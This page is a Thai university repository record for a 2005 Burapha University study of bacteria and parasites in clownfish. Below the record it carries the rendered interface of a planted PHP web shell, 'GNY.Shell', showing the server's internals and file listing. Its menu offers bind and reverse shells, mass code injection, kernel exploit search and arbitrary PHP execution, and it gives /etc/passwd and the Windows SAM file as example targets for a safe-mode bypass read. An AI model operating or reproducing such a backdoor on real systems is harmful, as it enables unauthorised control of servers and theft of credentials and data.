การตรวจแยกเชื้อแบคทีเรียและปรสิตที่ก่อให้เกิดโรคในปลาการ์ตูน.

Titleการตรวจแยกเชื้อแบคทีเรียและปรสิตที่ก่อให้เกิดโรคในปลาการ์ตูน.
Publication TypeResearch
Year of Publication2548
Authorsวรรณภา กสิฤกษ์.
Institutionมหาวิทยาลัยบูรพา. สถาบันวิทยาศาสตร์ทางทะเล.
Cityชลบุรี.
Typeงานวิจัย.
Keywordsปลาการ์ตูน - - ปรสิต., ปลาการ์ตูน - - โรค., สาขาเกษตรศาสตร์และชีววิทยา., แบคทีเรีย., โรคเกิดจากปรสิต., โรคเกิดจากแบคทีเรีย.
Abstractจากการศึกษาการตรวจหาเชื้อแบคทีเรีย และปรสิตที่ก่อให้เกิดโรคในปลาการณ์ตูนทั้งหมด 498 ตัวอย่าง พบสาเหตุที่ทำให้ปลาการ์ตูนตายมากที่สุดได้แก่ โรคที่เกิดจากโปรโตซัว คิดเป็นร้อยละ 51.78 รองลงมาพบโรคที่เกิดจากลุ่มเชื้อแบคทีเรียและรา และโรคที่เกิดจากสาเหตุ อื่น ๆ คิดเป็นร้อยละ 26.58 และ 21.64 ตามลำดับ โรคที่เกิดจากโปรโตซัว พบว่า โปรโตซัวที่พบมากที่สุด ได้แก่ Brooklynella hostilis คิด เป็นร้อยละ 37.88 รองลงมาพบ โปรโตซัวชนิดอื่น ๆ , Cryptocaryom irritans และ Amyloodinium ocellatum คิดเป็นร้อยละ 26.14 , 20.83 และ 15.15 ตามลำดับ แบคทีเรียที่พบมากที่สุดได้แก่ Vibrio sp. คิดเป็นร้อยละ 55.10 รองลงมา ได้แก่ Vibrio alginolyticus, V. fluvialis, Enterobacter cloacae,Edwardsiella hosinae,Providencia rettgeti และ Shewanella putrefaciens คิดเป็นร้อยละ 22.45, 10.20, 6.12, 2.04, 2.04 และ 2.04 ตามลำดับ Abstract Examined for bacteria and parasites infested of clownfishes 498 Samples, Protozoa group was found in highest number 51.78%. Bacteria and Fungi group, and other cased group were 26.58% and 24.64% respectively. For Protozoa group, Brooklynella hostilis was found in highest number 37.88%. Other protozoa, Cryptocaryom irritans and Amyloodinium ocellatum were found 26.14% , 20.83 % and15.15% respectively. For Bacteria group, Vibrio alginolyticus, V. fluvialis, Enterobacter cloacae,Edwardsiella hosinae,Providencia rettgeti and Shewanella putrefaciens werw found 22.45%, 10.20%, 6.12%, 2.04%, 2.04% and 2.04% respectively.
Notesภายใต้แผนงานวิจัยเรื่อง แผ่นงานวิจัยพัฒนาเทคโนโลยีการเพาะเลี้ยงปลาสวยงามน้ำเค็มในกลุ่มปลาการ์ตูน.
Research Notesได้รับทุนอุดหนุนการวิจัยจากงบประมาณแผ่นดิน ประจำปีงบประมาณ 2547-2548 สถาบันวิทยาศาสตร์ทางทะเล มหาวิทยาลัยบูรพา
Alternate TitleIsolation and identification of pathogenic bacteria and parasites of clownfish
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.72 GB of 389.83 GB (68.42%)Server IP: 10.32.1.15 - Your IP: 54.158.190.0

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0217 ]:.